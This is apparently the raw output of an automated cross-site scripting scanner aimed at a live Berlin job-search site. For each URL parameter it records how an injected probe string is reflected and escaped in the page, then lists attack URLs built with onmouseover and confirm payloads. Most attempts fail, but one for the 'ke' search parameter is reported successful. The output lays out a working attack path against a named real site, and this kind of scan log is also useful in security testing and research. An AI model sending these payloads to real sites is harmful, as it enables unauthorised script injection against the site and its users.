https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

GET Params:[9]
['stf', 'ns', 'qs', 'companyID', 'cityID', 'sourceOfTheSearchField', 'searchOrigin', 'ke', 'ws']
_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=/uvw"xyz'yxz<zxy&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [1]
<section class="hidden hidden_mex-margin js-filters-async" data-filters-ajax-url = "//jobs.berlin.de/5/index.cfm?event=resultlistpage:ajaxfiltersviewlet.showAjax&ke=&ws=Berlin&searchOrigin=Resultlist%5Ftop%2Dsearch&qs=%5B%5D&cityID=0&stf=%2Fuvw%22xyz%27yxz%3Czxy&companyID=0&lang=de&sourceOfTheSearchField=resultlistpage%3Ageneral&ns=1">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=/uvw&quot;xyz'yxz&lt;zxy&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=Berlin";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
ATTR:		False	False	True	True

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=" onmouseover="alert`1`&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=' onmouseover='alert`1`&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: ' onmouseover='alert`1`

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf="; confirm`1`; "&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf='; confirm`1`; '&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=/uvw"xyz'yxz<zxy&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [1]
<section class="hidden hidden_mex-margin js-filters-async" data-filters-ajax-url = "//jobs.berlin.de/5/index.cfm?event=resultlistpage:ajaxfiltersviewlet.showAjax&ke=&ws=Berlin&searchOrigin=Resultlist%5Ftop%2Dsearch&qs=%5B%5D&cityID=0&stf=freeText&companyID=0&lang=de&sourceOfTheSearchField=resultlistpage%3Ageneral&ns=%2Fuvw%22xyz%27yxz%3Czxy">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=/uvw&quot;xyz'yxz&lt;zxy&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=Berlin";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
ATTR:		False	False	True	True

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=" onmouseover="alert`1`&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=' onmouseover='alert`1`&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: ' onmouseover='alert`1`

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns="; confirm`1`; "&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns='; confirm`1`; '&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=/uvw"xyz'yxz<zxy&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [1]
<section class="hidden hidden_mex-margin js-filters-async" data-filters-ajax-url = "//jobs.berlin.de/5/index.cfm?event=resultlistpage:ajaxfiltersviewlet.showAjax&ke=&ws=Berlin&searchOrigin=Resultlist%5Ftop%2Dsearch&qs=%2Fuvw%22xyz%27yxz%3Czxy&cityID=0&stf=freeText&companyID=0&lang=de&sourceOfTheSearchField=resultlistpage%3Ageneral&ns=1">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=/uvw&quot;xyz'yxz&lt;zxy&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=Berlin";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
ATTR:		False	False	True	True

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=" onmouseover="alert`1`&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=' onmouseover='alert`1`&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: ' onmouseover='alert`1`

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs="; confirm`1`; "&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs='; confirm`1`; '&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=/uvw"xyz'yxz<zxy&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
var uxTools = {};
uxTools.variantName = "";
uxTools.testName = "";
uxTools.reference = "";
uxTools.hostName = "jobs.berlin.de";
uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=%5B%5D&amp;companyID=/uvw%22xyz'yxz%3Czxy&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=Berlin";
uxTools.protocol = "https";
uxTools.currentEvent = "error.xss";
uxTools.currentHandler = "error";
uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID="; confirm`1`; "&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID='; confirm`1`; '&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=/uvw"xyz'yxz<zxy&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
var uxTools = {};
uxTools.variantName = "";
uxTools.testName = "";
uxTools.reference = "";
uxTools.hostName = "jobs.berlin.de";
uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=%5B%5D&amp;companyID=0&amp;cityID=/uvw%22xyz'yxz%3Czxy&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=Berlin";
uxTools.protocol = "https";
uxTools.currentEvent = "error.xss";
uxTools.currentHandler = "error";
uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID="; confirm`1`; "&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID='; confirm`1`; '&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=/uvw"xyz'yxz<zxy&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [1]
<section class="hidden hidden_mex-margin js-filters-async" data-filters-ajax-url = "//jobs.berlin.de/5/index.cfm?event=resultlistpage:ajaxfiltersviewlet.showAjax&ke=&ws=Berlin&searchOrigin=Resultlist%5Ftop%2Dsearch&qs=%5B%5D&cityID=0&stf=freeText&companyID=0&lang=de&sourceOfTheSearchField=%2Fuvw%22xyz%27yxz%3Czxy&ns=1">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=/uvw&quot;xyz'yxz&lt;zxy&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=Berlin";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
ATTR:		False	False	True	True

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=" onmouseover="alert`1`&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=' onmouseover='alert`1`&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: ' onmouseover='alert`1`

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField="; confirm`1`; "&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField='; confirm`1`; '&searchOrigin=Resultlist_top-search&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=/uvw"xyz'yxz<zxy&ke=&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [1]
<section class="hidden hidden_mex-margin js-filters-async" data-filters-ajax-url = "//jobs.berlin.de/5/index.cfm?event=resultlistpage:ajaxfiltersviewlet.showAjax&ke=&ws=Berlin&searchOrigin=%2Fuvw%22xyz%27yxz%3Czxy&qs=%5B%5D&cityID=0&stf=freeText&companyID=0&lang=de&sourceOfTheSearchField=resultlistpage%3Ageneral&ns=1">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=/uvw&quot;xyz'yxz&lt;zxy&amp;ke=&amp;ws=Berlin";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
ATTR:		False	False	True	True

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=" onmouseover="alert`1`&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=' onmouseover='alert`1`&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: ' onmouseover='alert`1`

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin="; confirm`1`; "&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin='; confirm`1`; '&ke=&ws=Berlin

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=/uvw"xyz'yxz<zxy&ws=Berlin

----------------------------------------------------------------------------------
Attribute Context: [3]
<form class="" name="SearchBoxName"
method="GET" action="/" data-search-box="{&quot;siteCountry&quot;:&quot;de&quot;,&quot;language&quot;:&quot;de&quot;,&quot;isExpanded&quot;:true,&quot;HOMEPAGEANDHEADERVARIANT&quot;:null,&quot;quickFilters&quot;:{&quot;workTypeValues&quot;:{&quot;partTime&quot;:80002,&quot;homeOffice&quot;:80005,&quot;fullTime&quot;:80001}},&quot;suid&quot;:&quot;e3637a02-4dd0-4970-817d-77ffce067e35&quot;,&quot;disallowEmptySearchWithRecentSearches&quot;:false,&quot;RADIUSVALUE&quot;:30,&quot;searchOrigin&quot;:&quot;Resultlist_top-search&quot;,&quot;autosuggest&quot;:{&quot;typeTranslations&quot;:{&quot;postalcode&quot;:&quot;&quot;,&quot;company&quot;:&quot;Firma&quot;,&quot;keyword&quot;:&quot;&quot;,&quot;company_cp&quot;:&quot;Firma&quot;,&quot;jobid&quot;:&quot;&quot;,&quot;category&quot;:&quot;&quot;,&quot;geocity&quot;:&quot;&quot;,&quot;skill_facet&quot;:&quot;Kompetenz&quot;,&quot;jd&quot;:&quot;&quot;},&quot;enabled&quot;:true,&quot;queryParamValues&quot;:{&quot;companyType&quot;:false},&quot;type&quot;:&quot;jd,company_cp,skill_facet&quot;},&quot;radius&quot;:{&quot;enabled&quot;:true,&quot;options&quot;:{&quot;values&quot;:[5,10,20,30,40,50,75,100],&quot;defaultIndex&quot;:4}},&quot;showDetailedResultList&quot;:false,&quot;SINGLESEARCHASSISTANT&quot;:{&quot;isAvailable&quot;:false,&quot;displayThreshold&quot;:10,&quot;tooltipTheme&quot;:&quot;stepstone&quot;},&quot;links&quot;:{&quot;formAction&quot;:&quot;/&quot;,&quot;formActionCompany&quot;:&quot;/stellenanzeigen-arbeitgeber.html&quot;,&quot;formActionResultlistMobile&quot;:&quot;resultlist.dspResultList&quot;,&quot;formActionDetails&quot;:&quot;/ergebnisliste.html&quot;,&quot;advancedSearch&quot;:&quot;&quot;,&quot;formActionResultlist&quot;:&quot;/&quot;},&quot;showAdvancedSearchLink&quot;:true,&quot;focusWhatField&quot;:false,&quot;isMobile&quot;:false,&quot;autoSuggestValues&quot;:[],&quot;DISALLOWEMPTYSEARCH&quot;:false,&quot;WHATVALUE&quot;:&quot;/uvw\&quot;xyz'yxz zxy&quot;,&quot;RADIUSVALUEFORLABEL&quot;:30,&quot;homeOfficeQuickFilterEnabled&quot;:false,&quot;autosuggestSkillsEnabled&quot;:true,&quot;WHEREVALUE&quot;:&quot;Berlin&quot;,&quot;showQuickFilters&quot;:false}" >
<input type="search" name="ke"
class="form-control typeahead search-box__field search-box__field-what" placeholder="Jobtitel, Kompetenz oder Firmenname" value="
/uvw&quot;xyz'yxz zxy"
autocomplete="off" data-search-box-what
data-search-box-placeholder data-search-box-autosuggest-type="jd,company_cp,skill_facet">
<div
data-jobagentmodal-ajax-url="//jobs.berlin.de/5/index.cfm?event=resultlistpage:resultlistjobagentajaxviewlet.showPopover&lang=de&stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=/uvw"xyz'yxz<zxy&ws=Berlin&numberOfOffers=0"
data-jobagentmodal-base-ajax-url="//jobs.berlin.de/5/index.cfm?event=resultlistpage:resultlistjobagentajaxviewlet.showPopover&"
data-jobagentmodal
>

----------------------------------------------------------------------------------
HTML Context: [1]
<strong>/uvw&amp;quot;xyz'yxz zxy</strong>

----------------------------------------------------------------------------------
Script Context: [2]
<script type="text/javascript">
        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"658FE19E-5AD9-4F19-94BDD75E7AD5D99D","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":"0","resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":0,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"/uvw\"xyz'yxz zxy","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"Berlin","user__abtest_ticket":"BLACKLIST","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":0,"resultlist__searchandmatch_query_feedback":"-|-|-_0|0|-_0_0_-_-_0_0","resultlist__keyword_what":"/uvw\"xyz'yxz zxy","resultlist__filter_region_ids_abr":"","resultlist__language":"","page__platform_code_version":"V52-RWD","ssa__suid":"e3637a02-4dd0-4970-817d-77ffce067e35","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"A_BLACKLIST","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"bot","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[],"resultlist__listing_ids":"","resultlist__listing_ids_30val":"","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/142.248/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"relevance","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_no_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"Berlin","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"r","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_no_result-discovery__-candidate__[]","resultlist__filter_names_abr":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":0,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"what-freetext_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"A_BLACKLIST","resultlist__filter_names_dyn_var":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
    </script>
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=/uvw&quot;xyz'yxz&lt;zxy&amp;ws=Berlin";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [1]
<a href="/?&amp;ke=%2Fuvw%22xyz%27yxz%20zxy" class="linkify" >

----------------------------------------------------------------------------------

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
ATTR:		False	True	True	False

Attack Payloads for ATTR
['" onmouseover="alert`1`']

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=" onmouseover="alert`1`&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
ATTR:		False	True	True	False

Attack Payloads for ATTR
['" onmouseover="alert`1`']

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=" onmouseover="alert`1`&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`

Mitigation        "	'	<	/ 
ATTR:		False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=" onmouseover="alert`1`&ws=Berlin

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=' onmouseover='alert`1`&ws=Berlin

=>Detection  Successful with Payload: ' onmouseover='alert`1`
	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context

FINAL OUTPUT: 
<form class="" name="SearchBoxName"
method="GET" action="/" data-search-box="{&quot;siteCountry&quot;:&quot;de&quot;,&quot;language&quot;:&quot;de&quot;,&quot;isExpanded&quot;:true,&quot;HOMEPAGEANDHEADERVARIANT&quot;:null,&quot;quickFilters&quot;:{&quot;workTypeValues&quot;:{&quot;partTime&quot;:80002,&quot;homeOffice&quot;:80005,&quot;fullTime&quot;:80001}},&quot;suid&quot;:&quot;84c12566-85de-4c78-a04a-132b53f9809b&quot;,&quot;disallowEmptySearchWithRecentSearches&quot;:false,&quot;RADIUSVALUE&quot;:30,&quot;searchOrigin&quot;:&quot;Resultlist_top-search&quot;,&quot;autosuggest&quot;:{&quot;typeTranslations&quot;:{&quot;postalcode&quot;:&quot;&quot;,&quot;company&quot;:&quot;Firma&quot;,&quot;keyword&quot;:&quot;&quot;,&quot;company_cp&quot;:&quot;Firma&quot;,&quot;jobid&quot;:&quot;&quot;,&quot;category&quot;:&quot;&quot;,&quot;geocity&quot;:&quot;&quot;,&quot;skill_facet&quot;:&quot;Kompetenz&quot;,&quot;jd&quot;:&quot;&quot;},&quot;enabled&quot;:true,&quot;queryParamValues&quot;:{&quot;companyType&quot;:false},&quot;type&quot;:&quot;jd,company_cp,skill_facet&quot;},&quot;radius&quot;:{&quot;enabled&quot;:true,&quot;options&quot;:{&quot;values&quot;:[5,10,20,30,40,50,75,100],&quot;defaultIndex&quot;:4}},&quot;showDetailedResultList&quot;:false,&quot;SINGLESEARCHASSISTANT&quot;:{&quot;isAvailable&quot;:false,&quot;displayThreshold&quot;:10,&quot;tooltipTheme&quot;:&quot;stepstone&quot;},&quot;links&quot;:{&quot;formAction&quot;:&quot;/&quot;,&quot;formActionCompany&quot;:&quot;/stellenanzeigen-arbeitgeber.html&quot;,